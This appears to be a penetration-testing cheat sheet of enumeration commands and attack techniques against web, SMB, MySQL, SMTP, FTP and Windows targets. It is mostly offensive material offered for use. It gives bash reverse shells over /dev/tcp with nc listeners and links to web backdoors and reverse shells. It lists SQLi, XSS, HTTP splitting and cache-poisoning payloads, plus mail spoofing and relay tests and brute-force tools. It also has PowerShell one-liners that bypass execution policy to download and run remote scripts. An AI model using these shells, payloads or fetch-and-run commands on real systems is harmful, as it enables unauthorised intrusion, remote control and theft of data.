
Enumeration

General Enumeration:

nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1

Web Enumeration:

dirb http://192.168.0.1 /usr/share/wordlists/dirb/common.txt
nikto -host http://192.168.0.1

Web Ports 80, 8080 etc. open

  • Fingerprint server

    • Telnet ip_address port

    • Firefox plugins

      • All

        • firecat

      • Specific

        • add n edit cookies

        • asnumber

        • header spy

        • live http headers

        • shazou

        • web developer

  • Crawl website

    • lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)

    • httprint

    • Metagoofil

      • metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

  • Web Directory enumeration

    • Nikto

      • nikto [-h target] [options]

    • DirBuster

    • Wikto

    • Goolag Scanner

  • Manual Tests

    • Default Passwords

    • Install Backdoors

      • ASP

        • http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt

      • Assorted

        • http://michaeldaw.org/projects/web-backdoor-compilation/

        • http://open-labs.org/hacker_webkit02.tar.gz

      • Perl

        • http://home.arcor.de/mschierlm/test/pmsh.pl

        • http://pentestmonkey.net/tools/perl-reverse-shell/

        • http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz

      • PHP

        • http://php.spb.ru/remview/

        • http://pentestmonkey.net/tools/php-reverse-shell/

        • http://pentestmonkey.net/tools/php-findsock-shell/

      • Python

        • http://matahari.sourceforge.net/

      • TCL

        • http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes

      • Bash Connect Back Shell

        • GnuCitizen

          • Attack Box: nc -l -p Port -vvv

          • Victim: $ exec 5<>/dev/tcp/IP_Address/Port

          • Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done

        • Neohapsis

          • Attack Box: nc -l -p Port -vvv

          • Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin

          • Victim: $ exec 1>&0 # Next we copy stdin to stdout

          • Victim: $ exec 2>&0 # And finally stdin to stderr

          • Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0

    • Method Testing

      • nc IP_Address Port

        • HEAD / HTTP/1.0

        • OPTIONS / HTTP/1.0

        • PROPFIND / HTTP/1.0

        • TRACE / HTTP/1.1

        • PUT http://Target_URL/FILE_NAME

        • POST http://Target_URL/FILE_NAME HTTP/1.x

    • Upload Files

      • curl

        • curl -u <username:password> -T file_to_upload <Target_URL>

        • curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>

      • put.pl

        • put.pl -h target -r /remote_file_name -f local_file_name

      • webdav

        • cadaver

    • View Page Source

      • Hidden Values

      • Developer Remarks

      • Extraneous Code

      • Passwords!

    • Input Validation Checks

      • NULL or null

        • Possible error messages returned.

      • ' , " , ; , <!

        • Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.

      • – , = , + , "

        • Used to craft SQL Injection queries.

      • ' , & , ! , | , < , >

        • Used to find command execution vulnerabilities.

      • "><script>alert(1)</script>

        • Basic Cross-Site Scripting Checks.

      • %0d%0a

        • Carriage Return (%0d) Line Feed (%0a)

          • HTTP Splitting

            • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>

              • i.e. decoded, the injected value terminates the first response with Content-Length: 0 and then supplies a second one: HTTP/1.1 200 OK, Content-Type: text/html, Content-Length: 47, <html>blah</html>

          • Cache Poisoning

            • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>

      • %7f , %ff

        • byte-length overflows; maximum 7- and 8-bit values.

      • -1, other

        • Integer overflow and underflow vulnerabilities.

      • %n , %x , %s

        • Testing for format string vulnerabilities.

      • ../

        • Directory Traversal Vulnerabilities.

      • % , _, *

        • Wildcard characters can sometimes present DoS issues or information disclosure.

      • Ax1024+

        • Overflow vulnerabilities.

    • Automated table and column iteration

      • orderby.py

        • ./orderby.py www.site.com/index.php?id=

      • d3sqlfuzz.py

        • ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
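The HTTP Splitting and Cache Poisoning entries above only work when a server copies a request value into a response header without stripping CR/LF. The following Python is an added example (not code from the original page): it decodes the page's splitting payload, shows the naive header construction that lets it through, a hardened version that rejects it, and a status-line counter a proxy-side check could use to detect a split response. Function names and the `Set-Cookie: language=` header are assumptions for the demonstration.

```python
from urllib.parse import unquote

# Constructed copy of the HTTP Splitting payload listed above (query value only).
SPLIT_PAYLOAD = (
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a"
    "<html>Insert undesirable content here</html>"
)


def naive_response(language: str) -> bytes:
    """Vulnerable: the decoded query value is copied straight into a header line."""
    body = b"<html>ok</html>"
    return (
        b"HTTP/1.1 200 OK\r\n"
        b"Set-Cookie: language=" + language.encode("latin-1") + b"\r\n"
        b"Content-Type: text/html\r\n"
        + b"Content-Length: %d\r\n\r\n" % len(body)
        + body
    )


def hardened_response(language: str) -> bytes:
    """Fixed: refuse CR, LF and NUL before the value can reach a header line."""
    if any(c in language for c in "\r\n\0"):
        raise ValueError("CR/LF not allowed in header value")
    return naive_response(language)


def count_responses(raw: bytes) -> int:
    """Count HTTP status lines in a byte stream, i.e. how many responses a
    client or caching proxy would parse. One is normal; two means a split."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1."))


def demo() -> tuple:
    """Returns (responses seen from the naive server, whether the hardened
    server rejected the payload)."""
    value = unquote(SPLIT_PAYLOAD)
    split = count_responses(naive_response(value))
    try:
        hardened_response(value)
        blocked = False
    except ValueError:
        blocked = True
    return split, blocked


if __name__ == "__main__":
    print(demo())  # naive server emits 2 responses; hardened server blocks
```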

SMB\RPC Enumeration:

enum4linux 10.0.0.1
nmap --script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse 192.168.0.1

Mysql Enumeration:

nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 192.168.0.1 -p 3306

SMTP Enumeration:

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 192.168.0.1
  • Port 25 open

    • Fingerprint server

      • telnet ip_address 25 (banner grab)

    • Mail Server Testing

      • Enumerate users

        • VRFY username (verifies if username exists - enumeration of accounts)

        • EXPN username (verifies if username is valid - enumeration of accounts)

      • Mail Spoof Test

        • HELO anything

          • MAIL FROM: spoofed_address

          • RCPT TO: valid_mail_account

          • DATA

          • .

          • QUIT

      • Mail Relay Test

        • HELO anything

          • Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>

          • Unknown domain - mail from: <user@unknown_domain>

          • Domain not present - mail from: <user@localhost>

          • Domain not supplied - mail from: <user>

          • Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>

          • Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>

          • Use double quotes - mail from: <user@domain> rcpt to: <"user@recipient-domain">

          • Use IP address of the target server in the recipient - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>

          • Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>

          • Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>

    • Examine Configuration Files

      • sendmail.cf

      • submit.cf

FTP Enumeration:

nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 192.168.0.1

Is port 21 open?

  • Fingerprint server

    • telnet ip_address 21 (Banner grab)

    • Run command ftp ip_address

    • ftp@example.com

    • Check for anonymous access

      • ftp ip_address (Username: anonymous OR anon, Password: any@email.com)

  • Password guessing

    • Hydra brute force

    • medusa

    • Brutus

  • Examine configuration files

    • ftpusers

    • ftp.conf

    • proftpd.conf

Windows Enumeration:

  • Enable Remote Desktop (requires administrative privileges)

    • Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

  • Enable Firewall for Remote Desktop

    • Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

  • Add a firewall rule

    • powershell.exe -command New-NetFirewallRule -DisplayName "Allow Inbound Port 80" -Direction Inbound -LocalPort 80 -Protocol TCP -Action Allow

    • powershell.exe -command New-NetFirewallRule -DisplayName "Block Outbound Port 80" -Direction Outbound -LocalPort 80 -Protocol TCP -Action Block

  • View all services

    • powershell.exe -command Get-Service

  • Restart service

    • powershell.exe -command Restart-Service <ServiceName>

  • Configure the DNS server

    • powershell.exe -command Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 8.8.8.8

  • Get a Process Listing

    • powershell.exe -command Get-Process

  • Get a list of all computers from Active Directory

    • Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');Get-NetComputers

  • Collection of information from the system, registries, and other information

    • Powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/nishang/master/Gather/GetInformation.ps1'); Get-Information"


Last updated 5 years ago